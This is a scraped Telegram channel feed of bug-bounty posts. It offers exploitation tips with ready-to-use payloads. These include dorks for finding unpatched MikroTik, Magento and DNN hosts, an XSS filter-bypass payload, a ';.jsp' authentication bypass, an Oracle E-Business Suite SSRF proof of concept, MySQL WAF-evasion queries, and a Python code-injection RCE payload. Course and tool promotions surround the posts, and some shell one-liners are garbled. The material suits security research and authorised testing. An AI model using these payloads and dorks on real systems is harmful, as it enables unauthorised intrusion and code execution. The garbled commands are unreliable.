Brut Security
14.7K subscribers
910 photos
73 videos
287 files
967 links
โœ…Queries: @wtf_brut
๐Ÿ›ƒWhatsApp: wa.link/brutsecurity
๐ŸˆดTraining: brutsec.com
๐Ÿ“จE-mail: [email protected]
Download Telegram
๐Ÿšจ CVE-2025-61481 (CVSS 10.0) : Critical MikroTik Flaw Exposes Router Admin Credentials Over Unencrypted HTTP WebFig. It affects RouterOS v.7.14.2 and SwitchOS v.2.18.

๐Ÿ‘‡Dork:
HUNTER : https://product.name="MikroTik RouterOS"||https://product.name="MikroTik SwOS"
โค7๐Ÿ”ฅ2
CVE-2025-54236: Improper Input Validation in Magento (Adobe Commerce), 9.1 rating ๐Ÿ”ฅ

A critical vulnerability disclosed in a recent advisory allows attackers to perform RCE. Exploitation attempts have already been recorded!

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/Edck5
๐Ÿ‘‰ Dork: tag.name:"magento" AND http.headers.server:"Apache"

Vendor's advisory: https://helpx.adobe.com/security/products/magento/apsb25-88.html
โค3๐Ÿ‘2๐Ÿ—ฟ2
Hey Hunters,
DarkShadow here back again, dropping an

interesting XSS input sanitization bypass method.

You might have noticed that most websites currently use input sanitization by blocking certain tags and events, right!? Not really ๐Ÿ˜…

Okay, so first, have a look at some example tags that could trigger XSS:

script, img, a, iframe, object, video, audio, form, meta

The website blocks these keywords if they appear inside tags like < > or </ > and replaces them with nothing โ€” basically, null or an empty string "".

So, if you try a payload like:

<script>alert(1)</script>


It will be replaced with:

alert(1)


Now, think a bit more deeply โ€” what if you write a payload like this:

<script <img>> alert(1) </script </img>>

In this payload, look at the first part:
<script <img>>


Here, <img> is a full image tag, and it will definitely be removed by the sanitization filter. But what about <script<?

You can see the <script> tag isnโ€™t written properly yet โ€” itโ€™s <script followed by <, so it doesnโ€™t match the sanitization logic exactly.

Now, the interesting part is when the <img> tag gets removed from <script <img>>. After that, weโ€™re left with <script>!

That means the transformation is like this:

<script <img>> โ†’ remove <img> โ†’ <script>

</script </img>> โ†’ remove </img> โ†’ </script>

And finally, we get a valid payload:

<script>alert(1)</script>


So guys, if you really like reading DarkShadowโ€™s methodologies, show your LOVE.

And donโ€™t forget to follow me ๐Ÿ‘‰๐Ÿผ x.com/darkshadow2bd

#bugbountytips #xss
๐Ÿ‘16๐Ÿ”ฅ6โค4๐Ÿ—ฟ4
Brut Security pinned Deleted message
Extract all endpoints from a JS File and take your bug ๐Ÿž

- Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu


- Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt

#infosec #cybersec #bugbountytips
โค14๐Ÿ‘1
Hey Hunter's,
Darkshadow here back again!

โœจAuthentication bypass method:

โœ…Steps:
1. Target..com/carbon/server-admin/memory_info.jsp = redirect to login page [301 status]

2. Target..com/carbon/server-admin/memory_info.jsp;.jsp = gives the page content without authentication [200 status]

Payload ๐Ÿ‘‰๐Ÿผ ;.jsp


Tip:
1. Find sensitive path from js file which need authentication.
2. Try to find endpoints which end with a extension like: .php, .jsp, .shtml etc.
3. Simply Fuzz every endpoint with the same extension payload like: ;.jsp ;.php ;.shtml

If any of these gives 200ok check manually. And might it's works!

Don't forget to show your loves guy's โค๏ธ
โค21๐Ÿ‘4
๐ŸšจCVE-2025-64095 (CVSS 10.0) : A Critical Flaw in DNN Platform Allows Unauthenticated Website Overwrite

โšกDorks
HUNTER : https://product.name="DotNetNuke"
Hey Hunter,
DarkShadow is here back again, dropping an another SSRF!

Oracle E-Business Suite (12.2.3-12.2.14) SSRF POC


Method: POST
Path: /OA_HTML/configurator/UiServlet
Parameter: return_url
Body:
       
redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?>
        <initialize>
          <param name="init_was_saved">anything</param>
          <param name="return_url">https://BURP_COLLABORATOR</param>
          <param name="ui_def_id">0</param>
          <param name="config_effective_usage_id">0</param>
          <param name="ui_type">Applet</param>
        </initialize>


If you guy's Love to read then show your loveโค๏ธ

#bugbountytips #ssrf
โค25๐Ÿ”ฅ3
โžก๏ธFew Days Left Only! Two new Advanced Web Pentesting batches start soon โ€”
Nov 7: Mon & Fri, 8:00 PM IST
Nov 8: Sat & Sun, 9:00 PM IST


๐Ÿ‘‰Only 1 slot left across both batches. Interested? DM me now: https://wa.link/brutsecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
โค2
Join Our New Group-
https://t.iss.one/avascret

NEW THINGS COMING SOON ๐Ÿ”œ
โค2
โšก๏ธOutdated but Helpful Some MySQL tricks to break some #WAFs out there. โš”๏ธ by @BRuteLogic

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`


#infosec #cybersec #bugbountytips
โค17
Hey Hunter's,
Darkshadow here back again, and Just Look at the wild thing:

User 1 Password:
protecting_my_accounts_with_long_readable_passwords123

User 2 Password:
protecting_my_accounts_with_long_readable_passwords456


If the web application using bcrypt hash algorithm then both user can login each other using there different password!

Explanation:
In bcrypt hash, only use first 72 bytes to make hash. That means, after 72 bytes every bytes  (73th, 74th ...) are ignored!

So if the any users first 72 bytes are same  (protecting_my_accounts_with_long_readable_passwords), then no matter after what he put on the password they both can login each other account.

#bugbountytips
๐Ÿ—ฟ10โค5
Hey Hunter's,
Darkshadow here back again, with another unique RCE method!

๐Ÿ’€RCE via Python Code Injection:

โœ…POC:
{
"name": "darkshadow",
"args": {},
"json_schema": {"type": "object", "properties": {}},
"source_code": "def darkshadow():\n import os\n data='0'.encode('utf-8')\n return ''+os.popen('id').read()"
}


Do you guy's really enjoy to read my methodology's? And if you want more
Guy's then feel free to share your thoughts in the comments โค๏ธ

Don't forget to follow me guys x.com/darkshadow2bd
โค19๐Ÿ˜ฑ9๐Ÿ—ฟ1
๐ŸŒ Tool of the Day: IPING โ€” IP Lookup & Detection

๐Ÿ”Ž Need quick IP facts? IPING lets you lookup any IP or domain
๐Ÿš€ Instant, accurate, and totally free โ€” returns ISP, country, city, coordinates, ASN, risk score and more. Perfect for OSINT, incident triage, or simple curiosity.
๐Ÿงญ Try it nowhttps://www.iping.cc/

#osint #infosec #cybersecurity #recon #bugbounty #tools #ip
๐Ÿ”ฅ3โค2๐Ÿ‘1๐Ÿ‘1๐Ÿ—ฟ1
๐Ÿ”–The ultimate 403 Bypass wordlists and tester notes by JHaddix

๐Ÿ“ฑ Github: ๐Ÿ”— Link

---------------------------------------------------------
๐Ÿš€ ๐‹๐ž๐ฏ๐ž๐ฅ ๐”๐ฉ ๐˜๐จ๐ฎ๐ซ ๐‚๐ฒ๐›๐ž๐ซ๐’๐ž๐œ ๐†๐š๐ฆ๐ž! ๐Ÿ”ฅ
๐ŸŒ brutsec.com
๐Ÿ“ฑ ๐“๐ž๐ฅ๐ž๐ ๐ซ๐š๐ฆ: t.iss.one/brutsecurity
๐Ÿ’ผ ๐—: x.com/brutsecurity
๐Ÿ“– ๐„๐ญ๐ก๐ข๐œ๐š๐ฅ ๐‡๐š๐œ๐ค๐ข๐ง๐  ๐‘๐จ๐š๐๐ฆ๐š๐ฉ: topmate.io/saumadip/1391531
๐ŸŽ“ ๐‚๐จ๐ฎ๐ซ๐ฌ๐ž ๐„๐ง๐ซ๐จ๐ฅ๐ฅ๐ฆ๐ž๐ง๐ญ: wa.link/brutsecurity
โญ ๐‹๐ข๐ค๐ž ๐ญ๐ก๐ข๐ฌ ๐ฉ๐จ๐ฌ๐ญ? โ†’ ๐…๐จ๐ฅ๐ฅ๐จ๐ฐ, ๐‰๐จ๐ข๐ง, ๐’๐ฎ๐›๐ฌ๐œ๐ซ๐ข๐›๐ž & ๐’๐ž๐ง๐ ๐’๐ญ๐š๐ซ๐ฌ ๐ญ๐จ ๐ฌ๐ก๐จ๐ฐ ๐ฒ๐จ๐ฎ๐ซ ๐ฌ๐ฎ๐ฉ๐ฉ๐จ๐ซ๐ญ!

#bugbounty #bugbountytips #cybersecurity #infosec #brutsecurity
โค9
โšกSubDomain Grabber - A bug bounty tool to download, unzip, and clean subdomains from Chaos ProjectDiscovery.

๐ŸšจConverts *.
abc.com to https://abc.com, organizes into directories, and removes ZIPs. Offers a colorful CLI, filters (BugCrowd, HackerOne, etc.), sorting, and pagination.

โœ…
https://github.com/MuhammadWaseem29/SubDomain-Grabber
โค6๐Ÿณ1
๐Ÿ›ฐ๏ธ Discover IPING โ€” Your Go-To IP Intelligence Tool

๐Ÿ’ก IPING helps you uncover whatโ€™s behind any IP address in seconds.

๐ŸŒ From location and ASN to proxy status and risk level โ€” all the insights you need for smarter investigations or secure online operations. No sign-up, no limits, only accurate results.

๐Ÿš€ Explore now: https://www.iping.cc/
โค5๐Ÿ”ฅ3
๐ŸŒCloudRip - A tool that helps you find the real IP addresses hiding behind Cloudflare by checking subdomains. For penetration testing, security research, and learning how Cloudflare protection works.

๐Ÿ‘‰https://github.com/staxsum/CloudRip
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ16โค6๐Ÿ‘1